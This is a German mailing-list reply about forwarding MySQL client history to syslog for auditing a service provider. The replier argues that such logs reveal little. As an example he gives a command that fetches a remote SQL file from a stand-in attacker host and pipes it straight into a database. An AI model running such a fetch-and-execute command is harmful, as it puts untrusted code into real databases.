Re: [OT] mySQL-History2Syslog

On 06/10/2009 03:30 PM Thomas Halinka wrote:
> … wir seine Aktionen tracken.
>
> Auf der Shell konnte ich die Bash etwas ausbauen, dass sie nun ins
> syslog schreibt und somit alle eingeben Commands sichtbar sind und an
> den Zentralen Syslog-Server geschickt werden.
>
> Nun brauche ich das ganze auch für mySQL - hat jemand ne Idee, wie das
> umzusetzen wäre?!
>
> Ich hätte quasi gerne den Inhalt von
>
> /home/$USER/.mysql_history
>
> im Syslog - nur wie?
>
> Für kreative Ideen bin ich voll zu begeistern ;-)
>
> SEC und einige mySQL-Patche habe ich mir angesehen, aber irgendwie nicht
> [...]

Ggf. nicht die ganz passende.
Was macht Ihr wenn im syslog etwas derartiges findet:
curl https://h4x0r.example.com/whatever.txt | mysql thedatabase

Ein 'mymysqldump.pl', in der .bash_history lässt mich auch nicht ruhig
schlafen, wenn ich paranoid genug bin.

Ein '\. dump.sql' in der .mysql_history sagt auch nicht so viel aus.

Wenn kein Vertrauen zum Dienstleister besteht, dann sollte wohl eher
etwas bei der Besetzung diverser Posten nachgedacht werden.

Gruß,
Pascal
--
The trapper recommends today: defaced.0916116@localdomain.org